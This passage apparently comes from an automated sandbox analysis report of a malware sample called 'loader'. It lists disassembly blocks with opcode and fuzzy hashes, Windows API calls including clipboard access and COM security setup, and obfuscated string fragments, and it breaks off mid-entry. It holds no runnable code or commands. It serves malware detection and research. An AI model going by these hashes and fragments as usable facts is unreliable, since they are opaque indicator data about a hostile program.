                                                                                      • Opcode Fuzzy Hash: d655b1805acc7bec612192ef7d21b35e3bfb245058b9ef8769dc0fa6d1bb2b43
                                                                                      • Instruction Fuzzy Hash: 66B13376508200DBD7149F24DCA27BB73A1FF92314F08452EE98687391E7399D45C7AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c66e7bb44bfc2d94c9b71b24192f73588999aaab2e6472f418e6c18dfb934553
                                                                                      • Instruction ID: 2ac04351c4a0b478d5a1f4f46a5a167ccd76202ab8f877ef2169986906bf5690
                                                                                      • Opcode Fuzzy Hash: c66e7bb44bfc2d94c9b71b24192f73588999aaab2e6472f418e6c18dfb934553
                                                                                      • Instruction Fuzzy Hash: A751E5B1A083019FC714CF28C49576FB7E2ABD5314F188A6EE4A9C7382D739D855CB46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: W
                                                                                      • API String ID: 2994545307-3309183997
                                                                                      • Opcode ID: e7351303906a0154d53a9d3120627ce84a12f98ba55c389279fba2a00dde20f5
                                                                                      • Instruction ID: 6b5ca719cd67b63e367e33061a31cc22fb68b6a2697efd462438212122a65b22
                                                                                      • Opcode Fuzzy Hash: e7351303906a0154d53a9d3120627ce84a12f98ba55c389279fba2a00dde20f5
                                                                                      • Instruction Fuzzy Hash: 5B917871B0A3204BD7149A25EC9277F73D1EB91314F98443EE4868B3C2EA7C9C0AD75A
                                                                                      APIs
                                                                                      • LdrInitializeThunk.NTDLL(004413D2,005C003F,00000008,00000018,?), ref: 0043E9BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: @
                                                                                      • API String ID: 2994545307-2766056989
                                                                                      • Opcode ID: 861280132b47eb671953a737d70f1a716888bc2209c51724b1424383ae944329
                                                                                      • Instruction ID: b9882c602c5ace0b046ee6d55209bb011b7df538ba4fbaa8544629cdbf2cb46d
                                                                                      • Opcode Fuzzy Hash: 861280132b47eb671953a737d70f1a716888bc2209c51724b1424383ae944329
                                                                                      • Instruction Fuzzy Hash: 793134716083048FE314EF44C8C066BB7F4FB86314F15883DE699873A0D3799988CB5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 197da602a738ed90615523d394a4f70716086a60559f77200b92977aad947c64
                                                                                      • Instruction ID: 98947735670b321de62f25de5c6f141f0ffafa247f2bfd410a5fa51859ec01dd
                                                                                      • Opcode Fuzzy Hash: 197da602a738ed90615523d394a4f70716086a60559f77200b92977aad947c64
                                                                                      • Instruction Fuzzy Hash: D2713676A043415BE714EF19C850A6BB3E2FBD5340F19C42DE9858B361FB38A891C78A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8aece6992da07f900a35a41c9b26622640252d96e2bce80a6bd0c3d314a69db2
                                                                                      • Instruction ID: 70debdcfec7f10fde0637b4edfa7e10ec778db25867dfbbe9d453d37ae4d51e2
                                                                                      • Opcode Fuzzy Hash: 8aece6992da07f900a35a41c9b26622640252d96e2bce80a6bd0c3d314a69db2
                                                                                      • Instruction Fuzzy Hash: FA31B374A147828BE334CF54C840BABB3E1FF95304F04892ED489DB394DB7998098B96
                                                                                      APIs
                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043E956
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 74e8466f9c0fb650afc267f77ac7fa562a1203bb7fc8a38538895c5ff324e8b7
                                                                                      • Instruction ID: 43a3c5889aaf537389f49284b38b2b92559f99565eac067972442e43058a4d16
                                                                                      • Opcode Fuzzy Hash: 74e8466f9c0fb650afc267f77ac7fa562a1203bb7fc8a38538895c5ff324e8b7
                                                                                      • Instruction Fuzzy Hash: 29014CB19093008BE7009F35ACA676B7BD6DF9A315F044839E9C05E292C639581AC7A7
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043BFD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: da6800712980e551154b38ba978ea4e8e5317f5971431d0fbdf59f22c8f573ca
                                                                                      • Instruction ID: cc3c1706a03e690f6b91e6a124f2d173a6fa58680ff2e8fc5d31c86810b5b3ef
                                                                                      • Opcode Fuzzy Hash: da6800712980e551154b38ba978ea4e8e5317f5971431d0fbdf59f22c8f573ca
                                                                                      • Instruction Fuzzy Hash: 7DF0E53411D3408BDB096B34EC6262F7BA1DF5A715F10453CD182862F1DA358827CB4A
                                                                                      APIs
                                                                                      • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D473
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID:
                                                                                      • API String ID: 2538663250-0
                                                                                      • Opcode ID: 7f41d9b23e831ce4ae8948a350548d7c065836f6c64eab51cd9cb43922a88d91
                                                                                      • Instruction ID: 55e0167c8ad8bef13fa033a9d9ee22b09300915380d951105cf671eb2fce6579
                                                                                      • Opcode Fuzzy Hash: 7f41d9b23e831ce4ae8948a350548d7c065836f6c64eab51cd9cb43922a88d91
                                                                                      • Instruction Fuzzy Hash: 87D0A734594144AFD200675DEC07F26362CC783B24F404235B263C71D2DA506911C5AD
                                                                                      APIs
                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D4A5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeSecurity
                                                                                      • String ID:
                                                                                      • API String ID: 640775948-0
                                                                                      • Opcode ID: 103982d607cee43b265d78c97c913602c2dd4d45ca5578c56520c6a68563501e
                                                                                      • Instruction ID: 6d3ae4b6214a75680a4aef21b5c7739d0b298491b6b51663e31892c20e49f7f1
                                                                                      • Opcode Fuzzy Hash: 103982d607cee43b265d78c97c913602c2dd4d45ca5578c56520c6a68563501e
                                                                                      • Instruction Fuzzy Hash: 48D0C9347D834176F2748708AC13F5432516702F55F340624B326FE2E0CAE07502861C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3c?a$7R$9s:q$;w9u$<o0m$MJ_T$PF$QRQP$b$cah`$gce/$lp$rkof$tsa}$yf}V$~fpN$MC$[Y$_]
                                                                                      • API String ID: 0-945974825
                                                                                      • Opcode ID: b5b16bb113590787c6fde6ab80ea81be080de832431b1bf5d022472ec5bec015
                                                                                      • Instruction ID: 2df21e8ae9cd997d18b4bb70e282f3c761d66f11e35e6a146946800b30239e7a
                                                                                      • Opcode Fuzzy Hash: b5b16bb113590787c6fde6ab80ea81be080de832431b1bf5d022472ec5bec015
                                                                                      • Instruction Fuzzy Hash: A442F0B55083918BD334CF24C8957ABBBE1EFD5304F18896DD4D98B391EB784846CB86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Q&S$5U&W$5]=_$9Y&[$<M#O$APWE$J=B?$QRNv$U9L;$U9L;J=B?s1E3$f\nf$rIjK
                                                                                      • API String ID: 0-1849376372
                                                                                      • Opcode ID: 99310a6173f9c1d832450282aebb1bc3353c66722ee690a19fe1f757d411a1e2
                                                                                      • Instruction ID: 8a20ee4bffb447de7bdaa27343232466aa85e55d6fd216c03cfd089af8c86d88
                                                                                      • Opcode Fuzzy Hash: 99310a6173f9c1d832450282aebb1bc3353c66722ee690a19fe1f757d411a1e2
                                                                                      • Instruction Fuzzy Hash: DCD1047160C3848BD314CF25C49136BBBE2EBD2704F18C92DE4D95B396D779990ACB8A
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                      • String ID: _$e
                                                                                      • API String ID: 2832541153-1418839278
                                                                                      • Opcode ID: 1492ae62d9c8f6e8f7ea1264817679eafd862ba64dc6de23d08c7269d29365b9
                                                                                      • Instruction ID: 4e7ab790ce0dc81d80f9e03c9926a0abe7cf820c66819f64b658b1f4eaaee696
                                                                                      • Opcode Fuzzy Hash: 1492ae62d9c8f6e8f7ea1264817679eafd862ba64dc6de23d08c7269d29365b9
                                                                                      • Instruction Fuzzy Hash: AE41D17150C7818ED300AF7C988935EBFD1ABDA324F088A3EE4E5863C2D67C85498797
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4$7Eps$jlh`$mik]$u)fd${VcQ$\B
                                                                                      • API String ID: 0-4237533291
                                                                                      • Opcode ID: fdcb623395611c697a7c68644df436040c0514880e82e3216a90d51bf0b3aec8
                                                                                      • Instruction ID: e5ef24c31cac1c7678ba3bd02dba4386d60b2e5773f4692246e060c767e874b3
                                                                                      • Opcode Fuzzy Hash: fdcb623395611c697a7c68644df436040c0514880e82e3216a90d51bf0b3aec8
                                                                                      • Instruction Fuzzy Hash: 7F421235A18711DFE308DF25EC8062A77E2FB8A304F59897CE9818B3A1DB78D851CB45
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N$hlzn$imwm$mTW#$uhsZ$~`f~$T^O
                                                                                      • API String ID: 0-806153951
                                                                                      • Opcode ID: 3f87b8f844236f143103854b74b4faf5f9eb03202d4786b4a64a06ef91835dca
                                                                                      • Instruction ID: afc53c1070578e1691b90d42849856d3ec20f1ee68649b4cc5d1aa0af51d1780
                                                                                      • Opcode Fuzzy Hash: 3f87b8f844236f143103854b74b4faf5f9eb03202d4786b4a64a06ef91835dca
                                                                                      • Instruction Fuzzy Hash: D1D1063160C3918BD725CF39885036BBFE1AF97204F1849ADE4D59B392D63DC90AC796
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0EbC$D$F)H7$T9+G$Y5S3$^-Y+$nANO
                                                                                      • API String ID: 0-4126532374
                                                                                      • Opcode ID: 4e5dfb01cb2dd623f54277910ed69b89e7ec9b11a069f65cd8cbd5085fd9619d
                                                                                      • Instruction ID: 3e2fe4e7038656b8bf89e8c37aff5793599fd2f24770686693f00f845fa67244
                                                                                      • Opcode Fuzzy Hash: 4e5dfb01cb2dd623f54277910ed69b89e7ec9b11a069f65cd8cbd5085fd9619d
                                                                                      • Instruction Fuzzy Hash: 24C1EEB01093829BE320CF51D99475BBBF1BF81B48F109E1CE5D91B290D3BA9549CF86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #o'm$#s'q$$w u$%*+($%*+($+{&y
                                                                                      • API String ID: 0-3465401588
                                                                                      • Opcode ID: adbdf165e411e8a7c148abbbb54ca72fc7ac4bc61dcaa0333c544cb5b71acc5f
                                                                                      • Instruction ID: efaf2d7fbf0bc91d9fa670480c3a13c74f7e4b8a6b57285643f8ba170000f6c6
                                                                                      • Opcode Fuzzy Hash: adbdf165e411e8a7c148abbbb54ca72fc7ac4bc61dcaa0333c544cb5b71acc5f
                                                                                      • Instruction Fuzzy Hash: 69E10EB5609340DFE3248F25E88176FBBA1FBC6304F54892DE5C58B391DB788806CB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %*+($A9M?$H5JK$N=$S%M;$W!C'
                                                                                      • API String ID: 0-4058193705
                                                                                      • Opcode ID: a1e650a12516214562dcadb732fd425bf39ebee62d412113351d464a7da6a092
                                                                                      • Instruction ID: 989b260c283b6d6c97fa8b2f3c9edb2a500bc5545ab2e4ce7223e990c8efc322
                                                                                      • Opcode Fuzzy Hash: a1e650a12516214562dcadb732fd425bf39ebee62d412113351d464a7da6a092
                                                                                      • Instruction Fuzzy Hash: DCB13474208351DFE7108F24A88176FBBE4EB86358F54492DF5C59B292D3798906CB8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: <=$L^$hi$lc${E
                                                                                      • API String ID: 0-1924084148
                                                                                      • Opcode ID: 6f0d55af5d588fb369debd9c0a62e9f947f0aaf158dee2c09f6c9884d50da42f
                                                                                      • Instruction ID: 5915457069e997dacf6b807a0230b9027950d8cade2001cda093a07db98b2ef2
                                                                                      • Opcode Fuzzy Hash: 6f0d55af5d588fb369debd9c0a62e9f947f0aaf158dee2c09f6c9884d50da42f
                                                                                      • Instruction Fuzzy Hash: 7612EEB16083208BD320CF19E85132BB7F1FF96754F04892DE8C59B791E7799905CB9A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Bxdz$U[[h$f$fo$}6L
                                                                                      • API String ID: 0-290911908
                                                                                      • Opcode ID: 9ce3ea268f32a08bd726824abe08d559d71ace92874c2ffe448d89053079f639
                                                                                      • Instruction ID: 186a011957ab0b302ddbf5d4f0fd3c5b0e372ef02e8e4ca5b4aa048407dfe237
                                                                                      • Opcode Fuzzy Hash: 9ce3ea268f32a08bd726824abe08d559d71ace92874c2ffe448d89053079f639
                                                                                      • Instruction Fuzzy Hash: 8D81E46160C3828AD715CF29C49037BBFE29F92344F1849BEE4D59B383D779890AC766
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: UJHr$lc$mJHr$MO
                                                                                      • API String ID: 0-4006114247
                                                                                      • Opcode ID: 9ab16e63a3cda7c7ee12e10ffdcddcbeed2392a56aa22b05643f408b6ec1db2b
                                                                                      • Instruction ID: f55708db8befbf1a1894197a01fd1ec17e06cfec4ac16444925793b6aea3662e
                                                                                      • Opcode Fuzzy Hash: 9ab16e63a3cda7c7ee12e10ffdcddcbeed2392a56aa22b05643f408b6ec1db2b
                                                                                      • Instruction Fuzzy Hash: 14D1F1756483558FD320CF14E84276FB7E1EFC1314F05892EE8958B381EB78890ACB86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$'><$(G^x$/><
                                                                                      • API String ID: 0-3343709173
                                                                                      • Opcode ID: 7e85a3726e96f3214fd87d6b0f206403944d012c2fc80bffde29d6014236732f
                                                                                      • Instruction ID: 2e288f0f76336d9d94d21f87a4a07013cc1c5c192bb7596fd3b75b62982aae34
                                                                                      • Opcode Fuzzy Hash: 7e85a3726e96f3214fd87d6b0f206403944d012c2fc80bffde29d6014236732f
                                                                                      • Instruction Fuzzy Hash: D5616A739487524BD3389B24C825BABB6E2AFD5304F1A493CC4C9A7746EB380905C786
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D$K7$de
                                                                                      • API String ID: 0-1955444500
                                                                                      • Opcode ID: d234eca0981635b670469645aec80572a3aa641a1406bd48b9aae5cb45f49156
                                                                                      • Instruction ID: ba489a2c3d8d42c018694d4fbb916e700f77f656f55a3d737072087a95ad5f74
                                                                                      • Opcode Fuzzy Hash: d234eca0981635b670469645aec80572a3aa641a1406bd48b9aae5cb45f49156
                                                                                      • Instruction Fuzzy Hash: 1122FF756043008FD724CF15C8A17ABB7A2FF86308F18895DE4C59B391E7799946CBCA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (+$Q_$US
                                                                                      • API String ID: 0-257054658
                                                                                      • Opcode ID: e59e468361b338f9b371b19b10f5ea2972cd52c1d12ca0ae15dc60982496a1c4
                                                                                      • Instruction ID: c2be877ffce0f270715c11a4e9d8842d5002736ab2aef054f9ee3da50e5348a0
                                                                                      • Opcode Fuzzy Hash: e59e468361b338f9b371b19b10f5ea2972cd52c1d12ca0ae15dc60982496a1c4
                                                                                      • Instruction Fuzzy Hash: 340203B161C3409BD714DF25D8912ABBBE1EFD5314F08892DE4C98B351E738C94ACB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "O@$RO@$_@
                                                                                      • API String ID: 0-329040538
                                                                                      • Opcode ID: d551eeacf1234a9ac4cb178c82810e24e3d255f0c0f59fad84e5479135bb7579
                                                                                      • Instruction ID: 8529c4bc54ecd641f3d8c2ac439e0e09222fc0b310d5ceca5d0ec24161249c23
                                                                                      • Opcode Fuzzy Hash: d551eeacf1234a9ac4cb178c82810e24e3d255f0c0f59fad84e5479135bb7579
                                                                                      • Instruction Fuzzy Hash: 92518C78109302CFD708CF14D5A03AAB7F2FB8A706F06857DE88507291C7759999CF4A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: =tfP$HP@^
                                                                                      • API String ID: 0-2406627641
                                                                                      • Opcode ID: 52973fe9bb9e749b90ab74aad89fb74c8445f9f5489782af94578e639eab6826
                                                                                      • Instruction ID: 919b2c12ea22db56c82ebbc38bbdc81767d200e2637afe7225fa46e96859999a
                                                                                      • Opcode Fuzzy Hash: 52973fe9bb9e749b90ab74aad89fb74c8445f9f5489782af94578e639eab6826
                                                                                      • Instruction Fuzzy Hash: 28712771604B808EE326CF36D4507A3BBE1AF63304F5888AEC1EA4B347D7786506CB65
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: =tfP$HP@^
                                                                                      • API String ID: 0-2406627641
                                                                                      • Opcode ID: 0c73f007112f73566a2c12d16785b66dea47a3ac0a33fcfe28f67ab9e22bbb62
                                                                                      • Instruction ID: 9034b45b94c73021bbf74939c999c4eaa10970071ee5c8b6dd7ffc774f9a0c6c
                                                                                      • Opcode Fuzzy Hash: 0c73f007112f73566a2c12d16785b66dea47a3ac0a33fcfe28f67ab9e22bbb62
                                                                                      • Instruction Fuzzy Hash: 13710871645B808EE326CF36D4607A3BFE1AF63304F5889AEC0DA8B343D6786505CB55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Q+X$b+X
                                                                                      • API String ID: 0-2674441950
                                                                                      • Opcode ID: 17618e8df129ac59e3c58de69aa13a4f5a26421a86cccb75977b7be89bfde9b9
                                                                                      • Instruction ID: 5a90f5242e228ced49b7f9a691f53041ae50d70e9dd81af7ba55492d04131306
                                                                                      • Opcode Fuzzy Hash: 17618e8df129ac59e3c58de69aa13a4f5a26421a86cccb75977b7be89bfde9b9
                                                                                      • Instruction Fuzzy Hash: F121C1B01083528AC7299F25C8617B7B7A1FF96360F04462DE5E64B7D1F7388940C796
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: VVOP
                                                                                      • API String ID: 0-3147423582
                                                                                      • Opcode ID: a57f06044fff0c57db4d95515e9409d5b35d8815ddf91acb6116c41e213e95ef
                                                                                      • Instruction ID: 2553d163258990cf6634f2bb90ee463a851044aeec10f088061894c37fe6844f
                                                                                      • Opcode Fuzzy Hash: a57f06044fff0c57db4d95515e9409d5b35d8815ddf91acb6116c41e213e95ef
                                                                                      • Instruction Fuzzy Hash: B1523771604B518FC335CF25D490767BBE2BF96300B588A6ED4E74BBA2CB35A806CB54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: f
                                                                                      • API String ID: 2994545307-1993550816
                                                                                      • Opcode ID: 240bdaa6a14fe44b7c892e0fbbcac16d82d9a36931b9988dffe6c3d6016ad242
                                                                                      • Instruction ID: e086ff3596345417eccfcc2e0169fb7555612bae322473471b354bbcf4fdc1c6
                                                                                      • Opcode Fuzzy Hash: 240bdaa6a14fe44b7c892e0fbbcac16d82d9a36931b9988dffe6c3d6016ad242
                                                                                      • Instruction Fuzzy Hash: FE12E3706083419FD714CF29C8C1B2BBBE1AFC9314F249A2EE5959B3A1D774D805CB9A
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00444598,00000000,00000001,00444588), ref: 00424A79
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 580d0d482798b13b8607eb2aa4aa350e9be8350635ee404d84db5771204d1f34
                                                                                      • Instruction ID: e1f36a60adfc8295f48709a7560cdcd76d716ebdcc0d1e4130c983e91d2a443c
                                                                                      • Opcode Fuzzy Hash: 580d0d482798b13b8607eb2aa4aa350e9be8350635ee404d84db5771204d1f34
                                                                                      • Instruction Fuzzy Hash: 3951D0B0740210ABDB209B28EC82B7737A4EFC1768F454559F986CB390E379E901C72A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1864304258.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
